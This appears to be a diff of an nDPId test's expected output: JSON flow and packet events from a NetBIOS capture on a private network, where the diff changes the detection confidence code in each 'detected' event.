00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1447772221776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221776,"pkt":"ABzEEHkPACFislxDCABFAABOBFAAAH8RHeEKAAFXCgAEGOHsAIkAOqS0IKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1447772221776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772221776,"pkt":"ACFislxDABzEEHkPCABFAADLdA9AAIARbKQKAAQYCgABVwCJ4ewAt5RIIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1447772221882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221882,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOIosAAIAR+bAKAARlCgAF\/wCJAIkAOuxhlzUBEAABAAAAAAAAIEVORkZFTUVKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772225411,"pkt":"\/\/\/\/\/\/\/\/AOCBt3SFCABFAABOYEAAAIARu7sKAASlCgAF\/wCJAIkAOvrLhIYBEAABAAAAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1447772225411,"pkt":"AOCBt3SFABzEEHkPCABFAABaEmgAAIARC28KAAQYCgAEpQCJAIkARtanhIaFAAAAAAEAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABBg="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1447772230221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772230221,"pkt":"\/\/\/\/\/\/\/\/ABj+KG95CABFAABOBVEAAIARFw4KAARCCgAF\/wCJAIkAOg\/qh84BEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772234353,"pkt":"\/\/\/\/\/\/\/\/ABzEEHkPCABFAABOQtEAAIAR2bcKAAQYCgAF\/wCJAIkAOvkLntYBEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1447772234353,"pkt":"ABzEEHkP7Khr9GB3CABFAABaM4kAAIAR6fEKAAUBCgAEGACJAIkARtMVntaFAAAAAAEAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABQE="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1447772235481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772235481,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGmCABFAADlboAAAIARrCwKAAVdCgAF\/wCKAIoA0eR9EQ7pCQoABV0AigC7AAAgRUNFUEZIRUpFRkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAQk9XSUUAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1447772238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772238479,"pkt":"ABzEEHkPAOCBt8asCABFAABOD1sAAIARDUQKAAXpCgAEGACJAIkAOgf\/mi8AAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1447772238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772238479,"pkt":"AOCBt8asABzEEHkPCABFAADLWT8AAIARwuIKAAQYCgAF6QCJAIkAt\/eSmi+EAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1447772238721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772238721,"pkt":"\/\/\/\/\/\/\/\/EGBLoLzrCABFAABOP6wAAIAR3OYKAAQOCgAF\/wCJAIkAOtzbuxABEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 